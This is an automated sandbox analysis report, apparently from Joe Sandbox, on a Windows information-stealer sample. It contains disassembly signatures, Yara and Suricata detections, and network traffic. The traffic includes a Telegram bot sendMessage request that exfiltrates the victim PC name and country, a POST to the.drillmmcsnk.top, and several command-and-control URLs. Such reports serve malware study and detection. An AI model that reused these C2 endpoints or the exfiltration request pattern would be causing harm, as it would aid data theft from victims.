                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642C4C3h0_2_0642C1C8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06421EA1h0_2_06421BD0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642EFCBh0_2_0642ECD0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 064207A9h0_2_064204D8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 064281D3h0_2_06427ED8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06425EB1h0_2_06425BE0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642ACDBh0_2_0642A9E0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 064247B9h0_2_064244E8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642D7E3h0_2_0642D4E8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 064230C1h0_2_06422DF0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 064294F3h0_2_064291F8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06424C51h0_2_06424980
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642737Bh0_2_06427080
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06423559h0_2_06423288
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06429E83h0_2_06429B88
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642C98Bh0_2_0642C690
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642F493h0_2_0642F198
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06421571h0_2_064212A0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642869Bh0_2_064283A0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642B1A3h0_2_0642AEA8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06425581h0_2_064252B0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642DCABh0_2_0642D9B0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06423E89h0_2_06423BB8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06452983h0_2_06452688
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0645033Bh0_2_06450040
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06451B2Bh0_2_06451830
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06451FF3h0_2_06451CF8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06451194h0_2_06450E98
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06451663h0_2_06451368
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06450803h0_2_06450508
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 064524BBh0_2_064521C0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06450CCBh0_2_064509D0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D4800
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D3EA8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D4FEE
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D4C18
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D4C16
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D5379
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D3E72
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D5BB6
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D58F8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D5924

                Networking

                barindex
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2027/11/2024%20/%2012:08:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /den/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: the.drillmmcsnk.topContent-Length: 1432Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49718 -> 104.21.67.152:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 104.21.67.152:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49761 -> 104.21.67.152:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49754 -> 104.21.67.152:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49700 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2027/11/2024%20/%2012:08:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: the.drillmmcsnk.top
                Source: unknownHTTP traffic detected: POST /den/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: the.drillmmcsnk.topContent-Length: 1432Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 26 Nov 2024 08:47:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000276D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1560769620.0000000005783000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1749864993.0000000005789000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000276D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://the.drillmmcsnk.top
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000276D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://the.drillmmcsnk.top/den/P4.php
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://the.drillmmcsnk.top/den/api.php
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
